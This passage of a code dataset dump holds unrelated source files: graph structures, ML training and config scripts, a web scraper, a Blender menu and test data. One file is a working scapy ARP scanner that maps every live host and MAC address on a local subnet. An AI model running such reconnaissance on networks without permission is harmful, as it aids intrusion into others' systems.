vnode\n        self.nextArcNode = nextArcNode\n        self.info = info\n\n\nclass Vnode:\n    def __init__(self, data: str, firstArc: ArcNode = None):\n        self.data = data\n        self.firstArc = firstArc\n\n\nclass AdjvexStruct:\n    def __init__(self, vnodeLs: list, kind: int, vnum: int = None, arcnum: int = None):\n        self.vnodeLs = vnodeLs\n        self.vnum = vnum\n        self.arcnum = arcnum\n        self.kind = kind\n\n\n# Build the adjacency list of a directed graph\n# The logical structure is shown in directed_1.jpg\ndef buildAdj():\n    v1 = Vnode('v1')\n    v2 = Vnode('v2')\n    v3 = Vnode('v3')\n    v4 = Vnode('v4')\n\n    arc1 = ArcNode(\"arc1\")\n    arc2 = ArcNode(\"arc2\")\n    arc3 = ArcNode(\"arc3\")\n    arc4 = ArcNode(\"arc4\")\n    arc5 = 
ArcNode(\"arc5\")\n    arc6 = ArcNode(\"arc6\")\n\n    v1.firstArc = arc1\n    arc1.vnode = v2\n    arc1.nextArcNode = arc2\n    arc2.vnode = v3\n\n    v2.firstArc = arc3\n    arc3.vnode = v3\n    arc3.nextArcNode = arc4\n    arc4.vnode = v4\n\n    v3.firstArc = arc5\n    arc5.vnode = v4\n\n    v4.firstArc = arc6\n    arc6.vnode = v3\n\n    vnodeLs = [v1, v2, v3, v4]\n    directGraph = AdjvexStruct(vnodeLs, 1)\n\n    for vnode in vnodeLs:\n        print(vnode.data + \" - > \", end='')\n        arc = vnode.firstArc\n        while arc is not None:\n            print(arc.info + \" - > \", end='')\n            arc = arc.nextArcNode\n        print()\n\n\n# Build the inverse adjacency list of a directed graph\n# The logical structure is shown in directed_1.jpg\ndef buildUnAdj():\n    v1 = Vnode('v1')\n    v2 = Vnode('v2')\n    v3 = Vnode('v3')\n    v4 = Vnode('v4')\n\n    arc1 = ArcNode(\"arc1\")\n    arc2 = ArcNode(\"arc2\")\n    arc3 = ArcNode(\"arc3\")\n    arc4 = ArcNode(\"arc4\")\n    arc5 = ArcNode(\"arc5\")\n    arc6 = ArcNode(\"arc6\")\n\n    v2.firstArc = arc1\n    arc1.vnode = v1\n\n    v3.firstArc = arc2\n    arc2.vnode = v1\n    arc2.nextArcNode = arc3\n    arc3.vnode = v2\n    arc3.nextArcNode = arc6\n    arc6.vnode = v4\n\n    v4.firstArc = arc4\n    arc4.vnode = v2\n    arc4.nextArcNode = arc5\n    arc5.vnode = v3\n\n    vnodeLs = [v1, v2, v3, v4]\n    directGraph = AdjvexStruct(vnodeLs, 1)\n\n    for vnode in vnodeLs:\n        print(vnode.data + \" - > \", end='')\n        arc = vnode.firstArc\n        while arc is not None:\n            print(arc.info + \" - > \", end='')\n            arc = arc.nextArcNode\n        print()\n\n\n# Build the adjacency list of an undirected graph\n# The logical structure is shown in undirected_1.jpg\ndef buildUndirect():\n    v1 = Vnode('v1')\n    v2 = Vnode('v2')\n    v3 = Vnode('v3')\n    v4 = Vnode('v4')\n    v5 = Vnode('v5')\n\n    arc12 = ArcNode(\"arc1: v1 -> v2\")\n    arc21 = ArcNode(\"arc1: v2 -> v1\")\n    arc13 = ArcNode(\"arc2: v1 -> v3\")\n    arc31 = ArcNode(\"arc2: v3 -> v1\")\n    arc15 = ArcNode(\"arc3: v1 -> v5\")\n    arc51 = ArcNode(\"arc3: v5 -> v1\")\n    arc25 = ArcNode(\"arc4: v2 -> v5\")\n    arc52 = ArcNode(\"arc4: v5 -> v2\")\n    arc24 = ArcNode(\"arc5: v2 -> v4\")\n    arc42 = ArcNode(\"arc5: v4 -> v2\")\n    arc34 = ArcNode(\"arc6: v3 -> v4\")\n    arc43 = ArcNode(\"arc6: v4 -> v3\")\n    arc35 = ArcNode(\"arc7: v3 -> v5\")\n    arc53 = ArcNode(\"arc7: v5 -> v3\")\n\n    v1.firstArc = arc12\n    arc12.vnode = v2\n    arc12.nextArcNode = arc13\n    arc13.vnode = v3\n    arc13.nextArcNode = arc15\n    arc15.vnode = v5\n\n    v2.firstArc = arc21\n    arc21.vnode = v1\n    arc21.nextArcNode = arc24\n    arc24.vnode = v4\n    arc24.nextArcNode = arc25\n    arc25.vnode = v5\n\n    v3.firstArc = arc31\n    arc31.vnode = v1\n    arc31.nextArcNode = arc34\n    arc34.vnode = v4\n    arc34.nextArcNode = arc35\n    arc35.vnode = v5\n\n    v4.firstArc = arc42\n    arc42.vnode = v2\n    arc42.nextArcNode = arc43\n    arc43.vnode = v3\n\n    v5.firstArc = arc51\n    arc51.vnode = v1\n    arc51.nextArcNode = arc52\n    arc52.vnode = v2\n    arc52.nextArcNode = arc53\n    arc53.vnode = v3\n\n    vls = [v1, v2, v3, v4, v5]\n    undirectGraph = AdjvexStruct(vls, 2)\n\n    for vn in vls:\n        print(vn.data + \" \", end='')\n        arc = vn.firstArc\n        while arc is not None:\n            print(\"(\" + arc.info + \") \", end='')\n            arc = arc.nextArcNode\n        print()\n\n\nif __name__ == \"__main__\":\n    buildUnAdj()\n","sub_path":"graph/adjacency_list/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"88066323","text":"import numpy as np\n\nfrom .utils import *\nfrom .Functions import *\nfrom .IPMOptimizers import get_optimizer as get_ipm_opt\nfrom .UnconstrainedOptimizers import get_optimizer as get_unc_opt\n\nimport time\n\n\"\"\"Particle output will have the shape [[[]-particles]-timesteps] or paths[time_step][particle_idx]. 
Vals output has shape [[(obj, barrier, time)]-timestep]\"\"\"\n\n\n\n\ndef optimize(config, verbose=False):\n\n # init num_particles\n all_vals = []\n p_start = get_particles(config)\n p_curr = np.array([np.array(p) for p in p_start])\n p_num_particles = len(p_start)\n\n num_steps = config[\"num_path_steps\"]\n\n # get optimization method\n if config[\"optimization_type\"] == \"Unconstrained\":\n opt = get_unc_opt(config) \n elif config[\"optimization_type\"] == \"IPM\": \n opt = get_ipm_opt(config)\n\n if config[\"seed\"] is not None:\n np.random.seed(config[\"seed\"])\n\n for t in range(num_steps):\n print(t)\n\n p_curr, obj_barrier_vals = opt.update(p_curr, t, full_vals=True)\n p_curr = p_curr.copy()\n all_vals.append(obj_barrier_vals)\n \n return all_vals\n","sub_path":"new_adventure/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"338595480","text":"\nimport scapy.all as scapy\n\ndef scan(ip):\n arp_request=scapy.ARP(pdst=ip)\n # arp_request.show()\n broadcast = scapy.Ether(dst = \"ff:ff:ff:ff:ff:ff\")\n # broadcast.show()\n # scapy.ls(scapy.ARP())\n concadenate = broadcast/arp_request\n answered =scapy.srp(concadenate ,timeout=1,verbose=False)[0]\n # print(answered.summary())\n print(\"IP\\t\\t\\tMAC address\")\n for i in answered:\n print(i[1].psrc,i[1].hwsrc,sep=\"\\t\\t\")\n\n\n # scapy.arping(ip)\n\nscan(\"192.168.43.47/24\")\n\n\n\n\n\n\n\n\n\n\n","sub_path":"network scanning.py","file_name":"network scanning.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"189833374","text":"from yacs.config import CfgNode as CN\n\nC = CN()\n\nC.epochs = 50\nC.steps_per_epoch=None\nC.batch_size = 128\nC.n_features = 18\nC.n_samples = None\nC.w_optim='SGD'\nC.w_decay_order=2\nC.w_lr = 1e-3\nC.w_momentum=0.0\nC.w_weight_decay=5e-4\nC.a_optim=\"SGD\"\nC.a_decay_order=2\nC.a_lr = 1e-3\nC.a_momentum = 0.0\nC.a_weight_decay = 0.\nC.T = 2\nC.grad_clip = 100.\nC.grad_clip_bilevel=1000.\nC.logging_freq = 200\nC.w_checkpoint_freq = 1\nC.n_informative=7\nC.noise=0.25\nC.featurize_type=\"fourier\"\nC.initial_degree=1\nC.hvp=\"exact\"\nC.ihvp =\"exact\"\nC.inv_hess=\"exact\"\nC.normalize_a_lr=True\nC.w_warm_start=0\nC.log_grad_norm=True\nC.log_alphas=True\nC.alpha_weight_decay=0.\nC.grad_inner_loop_order=-1\nC.grad_outer_loop_order=-1\nC.arch_train_data=\"sotl\"\nC.model_type=\"vgg\"\nC.dataset=\"CIFAR\"\nC.device = 'cuda'\nC.train_arch=True\nC.dry_run=False\nC.mode=\"bilevel\"\nC.hessian_tracking=False\nC.smoke_test=True\nC.rand_seed = None\nC.w_scheduler=None\nC.a_scheduler=None\nC.features=None\nC.loss='ce'\nC.log_suffix = \"\"\nC.optimizer_mode = \"autograd\"\nC.bilevel_w_steps=None\nC.debug=False\nC.recurrent=True\nC.rand_seed=1\nC.adaptive_a_lr = False\nC.softplus_alpha_lr = False\nC.softplus_beta=100\nC.alpha_lr=1e-3\nC.arch_update_frequency=1\nC.loss_threshold=None\nC.progress_bar=True\nC.val_split=0.1\n\ndef get_cfg_defaults():\n \"\"\"Get a yacs CfgNode object with default values for my_project.\"\"\"\n # Return a clone so that the defaults will not be altered\n # This is for the \"local variable\" use pattern\n return C.clone()\n\ncfg = C","sub_path":"sotl_nas/configs/lr/mnist_vgg.py","file_name":"mnist_vgg.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} 
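The mnist_vgg.py record above follows the usual yacs pattern: a module-level CfgNode holding the defaults plus a get_cfg_defaults() accessor that hands back a clone. A typical consumer clones the defaults, merges experiment overrides, and freezes the result so later code cannot mutate hyperparameters (a sketch; the override values are hypothetical):

from yacs.config import CfgNode as CN

C = CN()            # tiny stand-in for the full default tree above
C.epochs = 50
C.batch_size = 128

def get_cfg_defaults():
    return C.clone()

cfg = get_cfg_defaults()
cfg.merge_from_list(['epochs', 10, 'batch_size', 256])  # e.g. CLI overrides
cfg.freeze()                        # further assignment now raises AttributeError
print(cfg.epochs, cfg.batch_size)   # -> 10 256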
+{"seq_id":"7288987","text":"from queue import Queue\nimport os\nimport random\nimport string\nfrom threading import Thread\nimport time\nimport itertools\nimport csv\nimport sys\nimport multiprocessing\n\n''' Shared variable among processes to signal program termination '''\nexit_flag = multiprocessing.Value('i', 0)\n''' Shared variable among processes to sync last row '''\nlast_line = multiprocessing.Value('i', 0)\n\nclass MMChallengeProcessing:\n def __init__(self):\n self.jobqueue = multiprocessing.Queue()\n self.outfile = 'source.csv'\n self.outsize = 10 # MB\n self.file = open(self.outfile, 'w')\n \n self.start = 0\n self.end = 5000\n self.offset = 5000\n self.lock = multiprocessing.Lock()\n\n ''' Function to generate row specified in document, returns string with newline '''\n def generateRow(self, count):\n string1 = ''.join(random.choices(string.ascii_lowercase, k=random.randint(1,32)))\n string2 = ''.join(random.choices(string.ascii_lowercase, k=random.randint(1,32)))\n data = [str(count), str(random.randint(1,10)), string1, string2]\n return ','.join(data) + '\\n'\n\n\n ''' Generates and writes data for range of primary keys given. For example, if 2000, 4000 are passed as arguments, \n function will generate 2000 rows starting with id 2000 and ending at 4000. \n '''\n def calculateAndWrite(self, start, end):\n\n ''' Generate Data '''\n temp = ''\n for index in range(start, end):\n temp += (self.generateRow(index))\n\n ''' Loop until last line meets global start variable. Write and return '''\n while True:\n if exit_flag.value == 1:\n break\n if last_line.value == start:\n #print('writing {} : {}'.format(start, end))\n self.file.write(temp)\n last_line.value = end\n return\n\n ''' Pops jobs off queue to process ''' \n def processJobs(self, jobs):\n while True:\n window = self.jobqueue.get()\n start, end = window\n self.calculateAndWrite(start, end)\n if exit_flag.value == 1:\n break\n\n\n ''' Worker that will continuously add chunks of primary id's to calculate until file size is reached '''\n def loadJobs(self, lock):\n while (os.path.getsize(self.outfile)//1024**2) < self.outsize:\n self.jobqueue.put([self.start, self.end])\n self.start = self.end \n self.end += self.offset\n\n \n print(\"--- %s seconds ---\" % (time.time() - start_time))\n\n print(\"Cleaning up queue to exit\")\n with multiprocessing.Lock():\n exit_flag.value += 1\n while not self.jobqueue.empty():\n self.jobqueue.get()\n\n\n ''' Main function '''\n def run(self):\n\n ''' Write Header Row '''\n self.file.write('id,integer1,string1,string2\\n') \n ''' Flush to avoid rewrite of header '''\n self.file.flush()\n \n ''' Start pushing jobs to queue '''\n t = multiprocessing.Process(target=self.loadJobs, args=(self.lock, ))\n t.start()\n \n ''' Process jobs and write to file '''\n numProcesses = 100\n for work in range(0, numProcesses):\n worker = multiprocessing.Process(target=self.processJobs, args=(self.jobqueue,))\n worker.start()\n \n \nif __name__ == '__main__':\n print(\"Generating File...\")\n start_time = time.time()\n\n mm = MMChallengeProcessing()\n mm.run()\n \n\n \n \n","sub_path":"gen_multiprocessing.py","file_name":"gen_multiprocessing.py","file_ext":"py","file_size_in_byte":3670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"370576106","text":"import ROOT as r \nimport numpy as np\nimport pickle,math,os\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\n\nimport tensorflow as tf\nfrom keras.backend import 
tensorflow_backend as K\n\nfrom keras import optimizers\n\n\ndef getCompiledModelA(nvars,nnodes):\n # optimal so far ( 0.980, 0.966)\n model = Sequential()\n model.add(Dense(30,input_dim=nvars, activation='relu'))\n model.add(Dense(10, activation='relu'))\n model.add(Dense(nnodes, activation='softmax'))\n adam = optimizers.adam(lr=1e-4) \n model.compile(loss='categorical_crossentropy', optimizer=adam, metrics=['accuracy','categorical_crossentropy'])\n return model\n\ndef getCompiledModelB(nvars,nnodes):\n model = Sequential()\n model.add(Dense(30,input_dim=nvars, activation='relu'))\n model.add(Dropout(0.4))\n model.add(Dense(10, activation='relu'))\n model.add(Dropout(0.4))\n model.add(Dense(10, activation='relu'))\n model.add(Dense(nnodes, activation='softmax'))\n adam = optimizers.adam(lr=1e-4) \n model.compile(loss='categorical_crossentropy', optimizer=adam, metrics=['accuracy','categorical_crossentropy'])\n return model\n\ndef freeze_session(session, keep_var_names=None, output_names=None, clear_devices=True):\n \"\"\"\n Freezes the state of a session into a pruned computation graph.\n\n Creates a new computation graph where variable nodes are replaced by\n constants taking their current value in the session. The new graph will be\n pruned so subgraphs that are not necessary to compute the requested\n outputs are removed.\n @param session The TensorFlow session to be frozen.\n @param keep_var_names A list of variable names that should not be frozen,\n or None to freeze all the variables in the graph.\n @param output_names Names of the relevant graph outputs.\n @param clear_devices Remove the device directives from the graph for better portability.\n @return The frozen graph definition.\n \"\"\"\n from tensorflow.python.framework.graph_util import convert_variables_to_constants\n graph = session.graph\n with graph.as_default():\n freeze_var_names = list(set(v.op.name for v in tf.global_variables()).difference(keep_var_names or []))\n output_names = output_names or []\n output_names += [v.op.name for v in tf.global_variables()]\n # Graph -> GraphDef ProtoBuf\n input_graph_def = graph.as_graph_def()\n if clear_devices:\n for node in input_graph_def.node:\n node.device = \"\"\n frozen_graph = convert_variables_to_constants(session, input_graph_def,\n output_names, freeze_var_names)\n return frozen_graph\n\ndef saveTF1p6Model(protobuffer_name):\n frozen_graph = freeze_session(K.get_session(),\n output_names=[out.op.name for out in model.outputs])\n tf.train.write_graph(frozen_graph, os.getcwd(), protobuffer_name, as_text=False)\n print (\"Saved frozen model in \",protobuffer_name)\n \n \nif __name__ == \"__main__\":\n\n from optparse import OptionParser\n parser = OptionParser(usage=\"%prog [options]\")\n parser.add_option(\"-i\", \"--infile\", dest=\"infile\", type=\"string\", default=\"vars.pkl\", help=\"Input pickle file (default: vars.pkl)\");\n parser.add_option(\"-o\", \"--outfile\", dest=\"outfile\", type=\"string\", default=\"trained_model\", help=\"Output pb and h5 fil;e (default: trained_model)\");\n parser.add_option(\"-c\", \"--channel\", dest=\"channel\", type=\"string\", default=\"2lss\", help=\"Final state: 2lss or 3l (default: 2lss)\");\n (options, args) = parser.parse_args()\n\n nvars = 29 if options.channel=='2lss' else 32 if options.channel=='3l' else 35\n\n data = pickle.load( open(options.infile,'rb'))\n sums = np.sum(data['train_y'],axis=0)\n print(sums)\n\n sig = sums[0]\n bkg = sums[1] + sums[2]\n #if options.channel=='2lss': bkg += sums[3]\n\n class_weight = { 0 : 
float((sig+bkg)/sig),\n 1 : float((sig+bkg)/bkg),\n 2 : float((sig+bkg)/bkg)}\n # if options.channel=='2lss':\n # class_weight.update( {3 : float((sig+bkg)/bkg)} )\n\n print ('weights will be', class_weight)\n\n with tf.Session(config=tf.ConfigProto(\n intra_op_parallelism_threads=50,\n inter_op_parallelism_threads=50)) as sess:\n K.set_session(sess)\n \n #nnodes = 4 if options.channel=='2lss' else 3\n nnodes = 3\n model = getCompiledModelA(nvars,nnodes)\n #model = getCompiledModelB(nvars,nnodes)\n\n history = model.fit( data['train_x'], data['train_y'], epochs=20, batch_size=80, validation_data=(data['test_x'], data['test_y']), class_weight=class_weight)\n\n modelname = os.getcwd()+'/'+os.path.basename(options.outfile).split('.')[0]\n # keras model (H5)\n model.save(modelname+'.h5')\n # tf model (PB)\n saveTF1p6Model(modelname+'.pb')\n \n pickle_out = open(modelname+'.pkl','wb')\n pickle.dump( history.history, pickle_out)\n pickle_out.close()\n \n","sub_path":"TTHAnalysis/python/tools/bdts/trainNet.py","file_name":"trainNet.py","file_ext":"py","file_size_in_byte":5086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"634591751","text":"# Name: Joshua Fogus\n# Last Modified: February 11, 2021\n# Description: A text box for accepting free-form user input.\n\nimport tkinter as tk\n\n\ndef text_input(parent, label, variable):\n \"\"\" creates a text input attached to the given parent, with\n the given label, and storing the result in the given\n variable. Returns a tuple of the label and input. \"\"\"\n tk_label = tk.Label(parent, text=\"{}: \".format(label))\n tk_label.grid(row=2, column=0, sticky=tk.W, pady=(0, 4))\n\n tk_input = tk.Entry(parent, textvariable=variable)\n tk_input.grid(row=2, column=1, sticky=tk.W, pady=(0, 4))\n\n return tk_label, tk_input\n\n\nif __name__ == \"__main__\":\n print(\"This is not meant to be run as a script. 
Please import this module.\")","sub_path":"life_generator/gui/text_input.py","file_name":"text_input.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"189073112","text":"#!/usr/bin/env python\r\n#coding:utf-8\r\nimport pandas as pd\r\nfrom requests_html import HTMLSession\r\n\r\nsession = HTMLSession()\r\nurl = \"https://www.jianshu.com/p/85f4624485b9\"\r\nr = session.get(url)\r\n\r\nsel = \"body > div.note > div.post > div.article > div.show-content > div > p > a\"\r\n\r\ndef get_text_link_from_sel(sel):\r\n mylist = []\r\n try:\r\n results = r.html.find(sel)\r\n for result in results:\r\n mytext = result.text\r\n mylink = list(result.absolute_links)[0]\r\n mylist.append((mytext,mylink))\r\n return mylist\r\n except:\r\n return None\r\n\r\ndf = pd.DataFrame(get_text_link_from_sel(sel))\r\ndf.columns = [\"text\",\"link\"]\r\ndf.to_csv(\"output.csv\",encoding=\"gbk\",index=False)\r\n\r\n\r\n#print(r.html.text)\r\n#print(r.html.links)\r\n#print(r.html.absolute_links)\r\n# print(results[0].text)\r\n# print(results[0].absolute_links)\r\n# print(\r\n# list(results[0].absolute_links)\r\n# )\r\n#","sub_path":"Reptile.py","file_name":"Reptile.py","file_ext":"py","file_size_in_byte":926,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"529994012","text":"data = [{\"name\": \"CR90 corvette\", \"class\": \"corvette\", \"cost\": \"3500000\", \"rating\": \n 5.7147, \"drive\": \"2.0\"}, \n{\"name\": \"Star Destroyer\", \"class\": \n \"Star Destroyer\", \"cost\": \"150000000\", \"rating\": 1.3338, \n \"drive\": \"2.0\"}, \n{\"name\": \"Sentinel-class landing craft\", \"class\": \"landing craft\", \"cost\": \"240000\", \n\"rating\": 4.166, \"drive\": \"1.0\"}, \n{\"name\": \"Death Star\", \"class\": \"Deep Space Mobile Battlestation\", \"cost\": \n \"1000000000000\", \"rating\": 4, \"drive\": \"4.0\"}, \n{\"name\": \"Millennium Falcon\", \"class\": \"Light freighter\", \"cost\": \"100000\", \"rating\": 5, \n \"drive\": \"0.5\"}, \n{\"name\": \"Y-wing\", \"class\": \"assault starfighter\", \"cost\": \n \"134999\", \"rating\": 7.407, \"drive\": \"1.0\"}, \n{\"name\": \"X-wing\", \"class\": \"Starfighter\", \"cost\": \"149999\", \"rating\": \n 6.666, \"drive\": \"1.0\"}, \n{\"name\": \"TIE Advanced x1\", \"class\": \"Starfighter\", \"cost\": \"unknown\", \"rating\": 0, \"drive\": \n \"1.0\"}, \n{\"name\": \"Executor\", \"class\": \"Star dreadnought\", \"cost\": \n \"1143350000\", \"rating\": 1.749, \"drive\": \"2.0\"}, \n{\"name\": \"Rebel transport\", \"class\": \"Medium transport\", \"cost\": \"unknown\", \"rating\": \n 0, \"drive\": \"4.0\"}, \n{\"name\": \"Slave 1\", \"class\": \"Patrol craft\", \"cost\": \"unknown\", \"rating\": 0, \"drive\": \"3.0\"}, \n{\"name\": \"Imperial shuttle\", \"class\": \"Armed government transport\", \"cost\": \"240000\", \"rating\": \n 4.1666, \"drive\": \"1.0\"}, \n{\"name\": \"EF76 Nebulon-B escort frigate\", \"class\": \"Escort ship\", \"cost\": \"8500000\", \"rating\": \n 2.352, \"drive\": \"2.0\"}, \n{\"name\": \"Calamari Cruiser\", \"class\": \"Star Cruiser\", \"cost\": \"104000000\", \"rating\": \n 9.615, \"drive\": \"1.0\"}, \n{\"name\": \"A-wing\", \"class\": \"Starfighter\", \"cost\": \"175000\", \"rating\": 5.714, \n \"drive\": \"1.0\"}, \n{\"name\": \"B-wing\", \"class\": \"Assault Starfighter\", \"cost\": \"220000\", \"rating\": \n 9.06, \"drive\": \"2.0\"}, {\"name\": \"Republic Cruiser\", \"class\": \"Space 
cruiser\", \n \"cost\": \"unknown\", \"rating\": 0, \"drive\": \"2.0\"}, \n{\"name\": \"Droid control ship\", \"class\": \"Droid control ship\", \"cost\": \"unknown\", \n \"rating\": 0, \"drive\": \"2.0\"}, {\"name\": \"Naboo fighter\", \"class\": \"Starfighter\", \n \"cost\": \"200000\", \"rating\": 5, \"drive\": \"1.0\"}, \n{\"name\": \"Naboo Royal Starship\", \"class\": \"yacht\", \"cost\": \"unknown\", \"rating\": 0, \"drive\": \"1.8\"}, {\"name\": \"Scimitar\", \"class\": \n \"Space Transport\", \"cost\": \"55000000\", \"rating\": 2.727, \n \"drive\": \"1.5\"}, \n{\"name\": \"J-type diplomatic barge\", \"class\": \"Diplomatic barge\", \"cost\": \"2000000\", \"rating\": 3.5, \"drive\": \"0.7\"}, \n{\"name\": \"AA-9 Coruscant freighter\", \"class\": \"freighter\", \"cost\": \"unknown\", \n \"rating\": 0, \"drive\": \"unknown\"}, \n{\"name\": \"Jedi starfighter\", \"class\": \"Starfighter\", \"cost\": \"180000\", \n \"rating\": 5.55, \"drive\": \"1.0\"}, \n{\"name\": \"H-type Nubian yacht\", \"class\": \"yacht\", \"cost\": \"unknown\", \n \"rating\": 0, \"drive\": \"0.9\"}, \n{\"name\": \"Republic Assault ship\", \"class\": \"assault ship\", \"cost\": \"unknown\", \"rating\": 0, \"drive\": \n \"0.6\"}, \n{\"name\": \"Solar Sailer\", \"class\": \"yacht\", \"cost\": \"35700\", \"rating\": 4.201, \n \"drive\": \"1.5\"}, {\"name\": \"Trade Federation cruiser\", \"class\": \"capital ship\", \n \"cost\": \"125000000\", \"rating\": 1.2, \"drive\": \"1.5\"}, \n{\"name\": \"Theta-class T-2c shuttle\", \"class\": \"transport\", \n \"cost\": \"1000000\", \"rating\": 1, \"drive\": \"1.0\"}, \n{\"name\": \"Republic attack cruiser\", \"class\": \"star destroyer\", \"cost\": \"59000000\", \"rating\": \n 1.69, \"drive\": \"1.0\"}, \n{\"name\": \"Naboo star skiff\", \"class\": \"yacht\", \"cost\": \"unknown\", \"rating\": 0, \"drive\": \"0.5\"}, \n{\"name\": \"Jedi Interceptor\", \"class\": \"starfighter\", \"cost\": \"320000\", \n \"rating\": 3.125, \"drive\": \"1.0\"}, \n{\"name\": \"arc-170\", \"class\": \"starfighter\", \"cost\": \"155000\", \"rating\": 6.451, \"drive\": \n \"1.0\"}, \n{\"name\": \"Banking clan frigte\", \"class\": \"cruiser\", \"cost\": \"57000000\",\n \"rating\": 1.754, \"drive\": \"1.0\"}, \n{\"name\": \"Belbullab-22 starfighter\", \"class\": \"starfighter\", \"cost\": \"168000\", \n \"rating\": 3.571, \"drive\": \"6\"}, \n{\"name\": \"V-wing\", \"class\": \"starfighter\", \"cost\": \"102500\", \"rating\": 9.756, \n \"drive\": \"1.0\"}]","sub_path":"app/tests/test_data_ships.py","file_name":"test_data_ships.py","file_ext":"py","file_size_in_byte":4062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"419570712","text":"ok = True\nfor subtask_path, return_value in task.run(\".subtask1/\", output_plugin=\"null\").items():\n if \"01_tasklet_1\" not in subtask_path:\n ok = False\n if return_value != \"OK\":\n ok = False\n\nif ok:\n return \"OK\"\nelse:\n return \"NOT OK\"\n","sub_path":"tests/plugins/content/task/01_run.py","file_name":"01_run.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"225883877","text":"# gpl author: Ryan Inch (Imaginer)\n\nimport bpy\nfrom bpy.types import Menu\nfrom . 
import utils_core\nfrom bl_ui.properties_paint_common import UnifiedPaintPanel\n\n# Particle Tools\n\nparticle_tools = (\n (\"None\", 'NONE'),\n (\"Comb\", 'COMB'),\n (\"Smooth\", 'SMOOTH'),\n (\"Add\", 'ADD'),\n (\"Length\", 'LENGTH'),\n (\"Puff\", 'PUFF'),\n (\"Cut\", 'CUT'),\n (\"Weight\", 'WEIGHT')\n)\n\n# Brush Datapaths\n\nbrush_datapath = {\n 'SCULPT': \"tool_settings.sculpt.brush\",\n 'VERTEX_PAINT': \"tool_settings.vertex_paint.brush\",\n 'WEIGHT_PAINT': \"tool_settings.weight_paint.brush\",\n 'TEXTURE_PAINT': \"tool_settings.image_paint.brush\",\n 'PARTICLE_EDIT': \"tool_settings.particle_edit.tool\"\n}\n\n# Brush Icons\n\nbrush_icon = {\n 'SCULPT': {\n \"BLOB\": 'BRUSH_BLOB',\n \"CLAY\": 'BRUSH_CLAY',\n \"CLAY_STRIPS\": 'BRUSH_CLAY_STRIPS',\n \"CREASE\": 'BRUSH_CREASE',\n \"DRAW\": 'BRUSH_SCULPT_DRAW',\n \"FILL\": 'BRUSH_FILL',\n \"FLATTEN\": 'BRUSH_FLATTEN',\n \"GRAB\": 'BRUSH_GRAB',\n \"INFLATE\": 'BRUSH_INFLATE',\n \"LAYER\": 'BRUSH_LAYER',\n \"MASK\": 'BRUSH_MASK',\n \"NUDGE\": 'BRUSH_NUDGE',\n \"PINCH\": 'BRUSH_PINCH',\n \"ROTATE\": 'BRUSH_ROTATE',\n \"SCRAPE\": 'BRUSH_SCRAPE',\n \"SIMPLIFY\": 'BRUSH_SUBTRACT',\n \"SMOOTH\": 'BRUSH_SMOOTH',\n \"SNAKE_HOOK\": 'BRUSH_SNAKE_HOOK',\n \"THUMB\": 'BRUSH_THUMB'\n },\n\n 'VERTEX_PAINT': {\n \"ADD\": 'BRUSH_ADD',\n \"BLUR\": 'BRUSH_BLUR',\n \"DARKEN\": 'BRUSH_DARKEN',\n \"LIGHTEN\": 'BRUSH_LIGHTEN',\n \"MIX\": 'BRUSH_MIX',\n \"MUL\": 'BRUSH_MULTIPLY',\n \"SUB\": 'BRUSH_SUBTRACT'\n },\n\n 'WEIGHT_PAINT': {\n \"ADD\": 'BRUSH_ADD',\n \"BLUR\": 'BRUSH_BLUR',\n \"DARKEN\": 'BRUSH_DARKEN',\n \"LIGHTEN\": 'BRUSH_LIGHTEN',\n \"MIX\": 'BRUSH_MIX',\n \"MUL\": 'BRUSH_MULTIPLY',\n \"SUB\": 'BRUSH_SUBTRACT'\n },\n\n 'TEXTURE_PAINT': {\n \"CLONE\": 'BRUSH_CLONE',\n \"DRAW\": 'BRUSH_TEXDRAW',\n \"FILL\": 'BRUSH_TEXFILL',\n \"MASK\": 'BRUSH_TEXMASK',\n \"SMEAR\": 'BRUSH_SMEAR',\n \"SOFTEN\": 'BRUSH_SOFTEN'\n }\n}\n\n\nclass BrushesMenu(Menu):\n bl_label = \"Brush\"\n bl_idname = \"VIEW3D_MT_sv3_brushes_menu\"\n\n def draw(self, context):\n mode = utils_core.get_mode()\n layout = self.layout\n settings = UnifiedPaintPanel.paint_settings(context)\n colum_n = utils_core.addon_settings(lists=False)\n\n layout.row().label(text=\"Brush\")\n layout.row().separator()\n\n has_brush = utils_core.get_brush_link(context, types=\"brush\")\n current_brush = eval(\"bpy.context.{}\".format(brush_datapath[mode])) if has_brush else None\n\n # get the current brush's name\n if current_brush and utils_core.get_mode() != 'PARTICLE_EDIT':\n current_brush = current_brush.name\n\n if mode == 'PARTICLE_EDIT':\n # if you are in particle edit mode add the menu items for particle mode\n for tool in particle_tools:\n utils_core.menuprop(\n layout.row(), tool[0], tool[1], brush_datapath[mode],\n icon='RADIOBUT_OFF', disable=True,\n disable_icon='RADIOBUT_ON'\n )\n else:\n column_flow = layout.column_flow(columns=colum_n)\n if utils_core.addon_settings(lists=True) == 'template':\n layout.template_ID_preview(settings, \"brush\",\n new=\"brush.add\", rows=3, cols=colum_n)\n else:\n # iterate over all the brushes\n for item in bpy.data.brushes:\n if mode == 'SCULPT':\n if item.use_paint_sculpt:\n # if you are in sculpt mode and the brush\n # is a sculpt brush add the brush to the menu\n utils_core.menuprop(\n column_flow.row(), item.name,\n 'bpy.data.brushes[\"%s\"]' % item.name,\n brush_datapath[mode], icon=brush_icon[mode][item.sculpt_tool],\n 